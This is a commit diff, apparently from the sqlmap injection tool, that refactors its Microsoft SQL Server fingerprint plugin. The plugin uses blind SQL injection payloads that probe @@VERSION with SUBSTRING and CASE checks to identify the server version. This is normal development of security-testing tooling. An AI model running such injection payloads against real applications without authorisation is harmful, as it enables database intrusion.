OR based inference works for the first time in history and fingerprint of 4 major DBMSes is now injection based (instead of AND)

2025-12-06 12:41:30 +00:00 · 2010-12-06 18:20:57 +00:00
parent e4b51dd549
commit d77ddbee47
8 changed files with 36 additions and 40 deletions
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -92,8 +92,7 @@ class Fingerprint(GenericFingerprint):
            result = True
        else:
            randInt = randomInt()
-            payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
-            result  = Request.queryPage(payload)
+            result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))

        if result:
            infoMsg = "confirming Microsoft SQL Server"
@@ -101,13 +100,12 @@ class Fingerprint(GenericFingerprint):

            for version in (0, 5, 8):
                randInt = randomInt()
-                query   = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
+                check   = "%d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))

                if conf.direct:
-                    query = query.replace("AND ", "SELECT 1 WHERE ", 1)
+                    check = "SELECT 1 WHERE " + check

-                payload = agent.fullPayload(query)
-                result  = Request.queryPage(payload)
+                result = inject.checkBooleanExpression(check)

                if result:
                    if version == 8:
@@ -126,9 +124,8 @@ class Fingerprint(GenericFingerprint):
                        break

                    else:
-                        query   = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
-                        payload = agent.fullPayload(query)
-                        result  = Request.queryPage(payload)
+                        check   = "%d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
+                        result = inject.checkBooleanExpression(check)

                        if result:
                            kb.dbmsVersion = ["7.0"]